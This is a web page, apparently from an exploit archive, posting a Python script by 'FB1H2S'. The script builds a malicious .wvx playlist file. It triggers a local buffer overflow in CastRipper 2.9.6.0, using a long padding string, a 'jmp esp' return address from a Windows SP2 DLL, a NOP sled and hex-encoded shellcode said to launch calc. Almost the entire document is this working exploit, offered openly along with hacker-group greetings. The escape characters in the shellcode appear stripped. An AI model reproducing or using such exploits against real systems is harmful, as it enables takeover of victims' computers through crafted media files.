Home / os / winme

castripperwvx-overflow.txt

Posted on 16 February 2010

#!/usr/bin/python #CastRipper 2.9.6.0 .wvx file local BOF 0day by FB1H2S # Greetz to all Darkc0de, Andhra Hackers and ICW Memebers #Thanks : Mr bond,beenu,Wipu,GOdwinAustin,The_empty,hg_H@x0r,r45c4l,it_security,eberly,Tia #Shoutz : SMART_HAX0R,j4ckh4x0r,41w@r10r,Hackuin #Catch us at www.andhrahackers.com or www.teamicw.in #And all respect to offensive security team header='<asx version = "3.0" > ' header2="<title>Cantonese 16 14-15</title> " header3="<entry> " href='<ref href="' shell='A' * 26040 shell2='x78x9cx0bx7d' #jmp esp ff e4 from windows dll win service-pack 2 extra= 'D' * 4 nop ="x90" * 10 #win calc the best nd easy payload to test exploits shellesp=("xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" "x7fxe8x7bxca") shell3='"' end=" </entry>" end1=" </asx>" out_file = open("exploitpy.wvx",'w') out_file.write(header+header2+header3+href+shell+shell2+extra+nop+shellesp+nop+shell3+end+end1) out_file.close()

 

TOP